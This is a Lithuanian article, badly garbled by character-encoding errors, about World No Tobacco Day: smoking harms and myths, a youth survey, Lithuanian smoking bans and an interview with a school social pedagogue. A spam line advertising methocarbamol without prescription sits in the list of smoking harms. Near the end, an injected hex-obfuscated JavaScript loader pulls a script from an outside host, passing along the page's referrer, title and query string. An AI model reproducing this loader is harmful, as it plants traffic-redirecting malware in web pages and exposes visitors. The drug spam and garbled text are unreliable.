PasaulinA� diena be tabako a�� skatinkime jaunA� A?mogA? iA?tarti NE

Lietuvos kalendoriuje galime aptikti daugybA� dienA?, kurias yra verta paminA�ti. A�iA? metA? geguA?A�s 31 d. galA�jome rasti nuorodA�, kad bA�tent A?iA� dienA� visame pasaulyje yra minima pasaulinA� diena be tabako.

Tabakas a�� agrikultA�rinis produktas, kuris rA�komas cigarA?, cigareA?iA?, cigariliA? pavidale, taip pat pypkA�se, kaljanu, bongu ar kt. BA�na taip pat ir kramtomasis tabakas bei uostomasis tabakas.DA�l A?alos sveikatai ir sukeliamos stiprios priklausomybA�s daugumoje A?aliA? tabako gaminiA? vartojimas ribojamas, nustatant minimalA? leistinA� amA?iA?.

A�i narkotinA� medA?iaga yra paplitusi visame pasaulyje ir nepaisant visA? amA?iaus apribojimA?, kenksmingumo, bei gana aukA?tA? cigareA?iA? kainos, A?i prekA� yra plaA?iai vartojama. Jaunimas taip pat noriai imasi A?io lA�to A?udymo ginklo net nepagalvodami apie A?ios medA?iagos A?alA�:

 • PlauA?iA?, gerklA?, burnos vA�A?ys, A?irdies ir kraujagysliA? ligos, lA�tinA� obstrukcinA� plauA?iA? liga.
 • Kiekvienais metais A?imtai tA�kstanA?iA? A?moniA? visame pasaulyje mirA?ta nuo ligA?, sukeltA? rA�kymo.
 • Tabakas neutralizuoja su maistu gaunamus vitaminus, jis vadinamas a�zvitaminA? A?udikua�?.
 • Viena surA�kyta cigaretA� sutrumpina rA�kanA?iojo gyvenimA� 11-a minuA?iA?.
 • RA�kanA?iA? veido oda bA�na pilka, blyA?ki, raukA?lA�s atsiranda ansA?iau ir yra ryA?kesnA�s.
 • CigaretA�se yra dervA?, kuriA? dalis nugula ant dantA? pavirA?iaus, A?takodamos jA? gelsvA�, o kartais net rudA� spalvA�.
 • „methocarbamol 750mg“ „no prescription“.

 • A�iandien per dienA� surA�kant pakelA?, per mA�nesA? dA�mais paleidA?iama daugiau negu 200 litA?. Per metus 2400.

Taigi, akivaizdA?iai galime matyti, jog rA�kimas kenkia ne tik mA�sA? sveikatai, bet ir iA?vaizdai ir biudA?etui. DA�l A?io A?alingo A?proA?io, kurio kai kurie netoleruoja, mes prarandame a�� daug laiko, naujA? paA?inA?iA?, pinigA? ir jaunystA�s metA?, kas yra labai svarbu mA�sA? gyvenime. Per ilgus metus cigareA?iA? egzistavimo visuomenA�je pradA�jo plisti tam tikri mitai, kuriuos A?iandienA� norime paneigti/pagrA?sti:

Pirmas mitas: RA�kymas ramina nervus ir gelbsti nuo stresA?. Atsakymas: IA? tikrA?jA? tabako komponentai neatpalaiduoja, bet paprasA?iausiai slopina svarbiausius centrinA�s nervA? sistemos sritis. TaA?iau pripratA�s prie cigaretA�s A?mogus nebegali be jos atsipalaiduoti. Susidaro uA?burtas ratas: streso atsiradimas ir jo A?veikimas priklauso nuo rA�kymo.

Antras mitas: RA�kantys A?monA�s ilgiau iA?lieka liekni. A�Atsakymas: Pirma, aplink pilna rA�kanA?iA? storuliA?, antra, cigarete slopindami alkio jausmA� skatinant atsirasti gastritA� ir dvylikapirA?tA�s A?arnos opA�. TreA?ia, lieknA�ti nuo rA�kymo – tai tas pat, kaip A?siskiepyti infekcinA� ligA� ir nuo jos tirpte sutirpti.

TreA?ias mitas: CigaretA� suA?ildo kai A?alta. Atsakymas: Tabako dA�mai tikrai suteikia A?ildomA�jA? efektA�, nes jame esantys nuodai sutraukia kraujagysles, padaA?nina pulsA� ir padidina kraujospA�dA?. Ar verta taip A?ildytis, kad vA�liau A?sitaisytumA�t hipertenzijA�?

Ketvirtas mitas: Tiek daug A?moniA? pasaulyje rA�ko, ir nieko, gyvena. Atsakymas: Gyvena, bet kaip? JaunA? dar nevargina skausmai, kuriuos sukelia rA�kymas, bet vyresni daA?niau serga ir gydosi nei gyvena visavertA? gyvenimA�. A�iais laikais A?rodyta, kad rA�kymas ir plauA?iA? vA�A?ys tiesiogiai susijA�. Tabako dA�mai sunaikina gena r53, kuris neleidA?ia atsirasti vA�A?iui, todA�l rA�kaliams A?ios ligos grA�smA� padidA�ja 30 %. Be to, rA�kaliai daA?niau serga skrandA?io opa, A?irdies kraujagysliA? ligomis. RA�kymas daA?nai sukelia chroniA?kA� bronchitA�.

Penktas mitas: Mesti rA�kyti laipsniA?kai maA?inant nikotino dozA� neA?manoma. Atsakymas: Sunku, bet galima. UA?uot surA�kius 5, o ne 10 cigareA?iA? per dienA�, geriau iA?bandyti nikotino terapijA�. Ji atliekama taip: nusprendus mesti rA�kyti A? organizmA� suleidA?iama tam tikra nikotino dozA� – taip siekiama uA?kirsti keliA� rA�kymo atsisakymo sindromui.

Norint labiau A?sigilinti A? rA�kanA?iA?jA? paplitimA�, nustatyti jA? amA?iA?, rA�kymo prieA?astis ir atrasti bA�dA?, kaip bA�tA? galima sumaA?inti tabakA� vartojanA?iA? A?moniA? skaiA?iA? buvo paplatinta internetinA� apklausa, kurioje sudalyvavo virA? 50 A?moniA? iki 25 metA?. Apklausos metu buvo pastebA�ta, jog respondentA? aplinkoje galima aptikti daugybA� A?moniA?, kurie propaguoja rA�kymA�.

1

DA?iaugiamA�s matydami, kad iA? visA? anketA� uA?pildA?iusiA? A?moniA? vos 11,8% teigA�, jog patys rA�ko. Taip pat, respondentA? papraA?A�me iA?sakyti ir savo nuomonA�, kas padA�tA? sumaA?inti rA�kanA?iA?jA? skaiA?iA?.

AtsakymA? sulaukA�me A?vairiA?:

 • Daugiau reklamA? skatinanA?iA? nerA�kyti
 • Daugiau informacijos apie rA�kymo A?alA�
 • DidesnA�s cigareA?iA?/tabako kainos
 • RA�kymo vietA? ribojimas
 • Realus pasekmiA? vaizdavimas

Kalbant apie rA�kymo vietA? ribojimA�, Lietuvoje a�� jis ganA�tinai grieA?tas. A�statymai draudA?ia rA�kyti/vartoti tabakA�: A?vietimo A?staigose, sveikatos prieA?iA�ros A?staigose, interneto kavinA�se, patalpose kur vyksta sporto renginiai, darbo vietose, esanA?iose uA?darose patalpose (taA?iau leidA?iama A?rengti specialias patalpas rA�kymui), bendro naudojimo patalpose, kuriose nerA�kantieji gali bA�ti priversti kvA�puoti tabako dA�mais, vieA?ajame transporte (iA?skyrus tolimojo susisiekimo traukinius ir orlaivius su A?rengtomis specialiomis vietomis), restoranuose, kavinA�se, baruose, kitose vieA?ojo maitinimo A?staigose, klubuose, diskotekose, iA?skyrus specialiai A?rengtus cigarA? ar pypkiA? klubus.

A�sigilinus A? rA�kymo A?alA� vertA�tA? grA?A?ti prie jau minA�tos pasaulinA�s dienos be tabako. 1987 m. Pasaulio Sveikatos Organizacijos nariai, siekdami atkreipti pasaulio dA�mesA? A? epidemiA?kai plintanA?ias, taA?iau iA?vengiamas mirtis, sukeltas rA�kymo, paskelbA� geguA?A�s 31 d. Pasauline diena be tabako. Pasaulio sveikatos organizacija primygtinai rekomenduoja kovoti prieA? tabako pramonA�s veiksmus ir visomis pastangomis kontroliuoti tabako epidemijos plitimA� pasaulyje. Svarbu nepamirA?ti, kad dideli A?iA? dienA? rA�kymo statistikos rodikliai a�� meistriA?kas tabako industrijos ir reklamos vilkA? darbas. A?iniasklaida, verslas ir nepelno siekianA?ios organizacijos kvieA?iamos vienytis ir geguA?A� skelbti nerA�kymo mA�nesiu.Taip pat, A? kovA� su rA�kymA? stoja ir Lietuvos mokyklos. Kaip ir kiekvienais metais A? A?iA� akcijA� A?sitraukA� ir KA�dainiA? A�viesioji gimnazija.

A�ia tema nutarA�me pakalbinti ir a�zDiena be tabakoa�? akcijos vykdytoje A?viesiojoje gimnazijoje a�� socialinA� pedagogA�, magistrA� IndrA� MackeviA?ienA�.

Ar jA�sA? atstovaujamoje mokykloje rA�kymas a�� opi problema?

Visoje Lietuvoje pastebima grA�sminga tendencija, kad nepaisant A?vairiausiA? priemoniA? riboti tabako gaminiA? prieinamumA� nepilnameA?iams, tabako vartojimas tarp paaugliA? didA�ja, rA�kanA?iA? amA?ius jaunA�ja. MA�sA? gimnazija a�� ne iA?imtis.

KodA�l nusprendA�te organizuoti dienA� be tabako ir A�viesiojoje gimnazijoje?

,,Diena be tabakoa�? A?vairiausiais bA�dais minime kasmet, todA�l kad tai opi problema ne tik gimnazijoje, bet ir visoje Lietuvoje, tad organizuoti ar ne, klausimA? nekyla.

Kaip minite A?iA� dienA�? (nebA�tinai, kaip minA�jote A?iais metais, bet per visA� laikA�)

A�vairiais bA�dais atkreipdami dA�mesA? A? A?iA� problemA�, t.y. organizuojame prevencines akcijas, ruoA?iame ir daliname informacija (lankstinukus) prieA? rA�kymA�, rodome prevencinius antireklaminius klipus.

JA�sA? nuomone, kas padA�tA? sumaA?inti rA�kanA?iA?jA? skaiA?iA? mokyklose?

Manau, televizijoje rA�kymas turA�tA? bA�ti pristatomas ir reklamuojamas, kaip A?alingas, o ne socialiai priimtinas reiA?kinys, nes kasmet tabako gamintojai ir platintojai investuoja milA?iniA?kus pinigus A? kino pramonA�, per kuriA� nesunkiai pasiekia ir jaunA�jA� kartA�. A�eimos vaidmuo taip pat labai svarbus a�� A?eimose kur rA�ko tA�vai, rA�kanA?iA? vaikA? procentas dvigubai didesnis nei tose, kur yra visai nerA�koma. Ne maA?iau reikA?mingas faktorius a�� visuomenA�s nuostatos ir poA?iA�ris A? rA�kantA? vaikA�. Esame pasiekA� ribA�, kai vaikA? rA�kymas nebelaikomas didele problema. Vaikai, nejausdami gA�dos, baimA�s ir atsakomybA�s, mano, kad tai a�� A?aidimas, kuris neatneA? rimtesniA? pasekmiA?.

Ar manote, jog daromos akcijos prieA? rA�kymA� daro A?takA� jaunam A?mogui?

Manau, kad tai priklauso nuo paA?io A?mogaus, kiek jis priima teikiamA� informacijA� ir kiek jam tai A?domu. Tikiuosi, kad nors 20 proc. vaikA? tai iA?girsta ir priima, tad norA�A?iau tikA�ti, kad galbA�t kaA?kA� keiA?ia savo elgesyje, mA�styme.

Skatinkime jaunus A?mones nepasikliauti a�zbandosa�? jausmu ir pasakyti tabako vartojimui NE, juk platindami informacijA� apie rA�kymo A?alA�, padarinius bei ragindami jaunA� A?mogA? atsisakyti pagundos, mes galime iA?gelbA�ti ne vienA� A?mogA?, uA?kirsti keliA� vA�A?iui bet ir padaryti LietuvA� A?varesne bei pavyzdingesne kitoms, kaimyninA�ms A?alims.

276543

var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Parašykite komentarą

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *